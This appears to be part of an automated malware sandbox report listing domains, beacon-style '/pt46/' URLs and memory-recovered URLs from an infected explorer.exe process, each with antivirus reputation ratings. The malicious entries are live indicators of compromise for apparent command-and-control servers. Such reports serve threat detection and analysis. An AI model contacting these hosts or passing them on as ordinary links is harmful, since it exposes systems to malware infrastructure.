          wheresthechocolateat.com
          		76.223.105.230
          		truetrueunknown
          www.theselflovesite.com
          		unknown
          		unknowntrueunknown
          www.af28.top
          		unknown
          		unknowntrueunknown
          www.strategiclogisticsagency.com
          		unknown
          		unknowntrueunknown
          www.iiixc759q.xyz
          		unknown
          		unknowntrueunknown
          www.wvufcw948o.top
          		unknown
          		unknowntrueunknown
          www.wheresthechocolateat.com
          		unknown
          		unknowntrueunknown
          www.betbox2341.com
          		unknown
          		unknowntrueunknown
          www.sliveringaf.christmas
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.wheresthechocolateat.com/pt46/true
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.wvufcw948o.top/pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAztrue
          • Avira URL Cloud: safe
          		unknown
          http://www.arlatwestern.shop/pt46/?ara=0RpqK4N+sKWumQPIkFOTbgKQJXSBpFKqwGjlCYY5Ihaqw+DawbshP/fsCF3RmMSwrLNm&D8V=_FNDAztrue
          • Avira URL Cloud: phishing
          		unknown
          http://www.wheresthechocolateat.com/pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAztrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://aka.ms/odirmrexplorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.dreziuy.xyzexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmptrue
          • 0%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.af28.topReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.arlatwestern.shopReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.uddyen.shopexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://excel.office.comexplorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.per-watch.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.wheresthechocolateat.comReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.uddyen.shop/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.betbox2341.comReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.harbalmaizik.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.sliveringaf.christmas/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 5%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000002.4140282960.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.twinportslocal.com/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.iiixc759q.xyz/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000003.3105555593.000000000C9E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105760256.000000000C9C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3459517159.000000000C9E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105408163.000000000C96C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105927486.000000000C9E0000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.serverdayz.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://wns.windows.com/Lexplorer.exe, 00000002.00000000.1694928784.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140282960.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.iiixc759q.xyz/pt46/www.sliveringaf.christmasexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://www.theselflovesite.com/pt46/www.iiixc759q.xyzexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://word.office.comexplorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.theselflovesite.com/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 5%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.wvufcw948o.topexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.serverdayz.com/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.wheresthechocolateat.com/pt46/www.serverdayz.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.uddyen.shop/pt46/www.harbalmaizik.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.strategiclogisticsagency.com/pt46/www.arlatwestern.shopexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://outlook.com_explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.serverdayz.comReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.strategiclogisticsagency.comReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.betbox2341.com/pt46/www.dreziuy.xyzexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.sliveringaf.christmas/pt46/www.twinportslocal.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.cb214.pro/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.sliveringaf.christmasexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 3%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.harbalmaizik.comReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://powerpoint.office.comcemberexplorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.iiixc759q.xyzexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 4%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.betbox2341.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.betbox2341.com/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.microexplorer.exe, 00000002.00000000.1691865413.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1693513837.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1692211406.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.twinportslocal.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.arlatwestern.shopexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          		unknown
          http://www.dreziuy.xyzReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://www.twinportslocal.com/pt46/www.per-watch.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.cb214.proReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.per-watch.comReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.af28.top/pt46/www.wvufcw948o.topexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/qexplorer.exe, 00000002.00000003.3106730980.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.theselflovesite.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.arlatwestern.shop/pt46/www.betbox2341.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: phishing
          		unknown
          http://www.per-watch.com/pt46/www.cb214.proexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.wvufcw948o.top/pt46/www.wheresthechocolateat.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.wvufcw948o.top/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.cb214.pro/pt46/www.uddyen.shopexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.per-watch.com/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.dreziuy.xyz/pt46/www.af28.topexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmptrue
          • Avira URL Cloud: malware
          		unknown
          http://www.serverdayz.com/pt46/www.theselflovesite.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.wheresthechocolateat.comexplorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.iiixc759q.xyzReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.wvufcw948o.topReferer:explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.strategiclogisticsagency.com/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.wheresthechocolateat.com/pt46/explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmpfalse
